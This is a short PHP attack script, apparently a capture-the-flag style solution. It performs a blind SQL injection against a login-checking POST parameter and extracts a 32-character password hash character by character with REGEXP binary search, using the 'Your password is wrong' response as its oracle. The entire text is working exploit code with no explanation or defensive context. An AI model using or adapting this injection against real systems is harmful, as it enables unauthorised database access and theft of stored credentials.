$sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
$sPost = 'inject=Inject&injection=';
$sCharset = 'ABCDEF0123456789';
/* for every character */
for ($i=0, $hash=''; $i<32; ++$i) {
$ch = $sCharset;
do {
$ch1 = substr($ch, 0, intval(strlen($ch)/2));
$ch2 = substr($ch, intval(strlen($ch)/2));
$p = $sPost.'absolutelyimpossible\' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$hash.'['.$ch1.']\' AND sess1\'=\'1';
$res = libHTTP::POST($sUrl, $p);
if (strpos($res['content'], 'Your password is wrong') === false)
$ch = $ch1;
else
$ch = $ch2;
} while (strlen($ch) > 1);
$hash .= $ch;
echo "\rhash: ".$hash;
}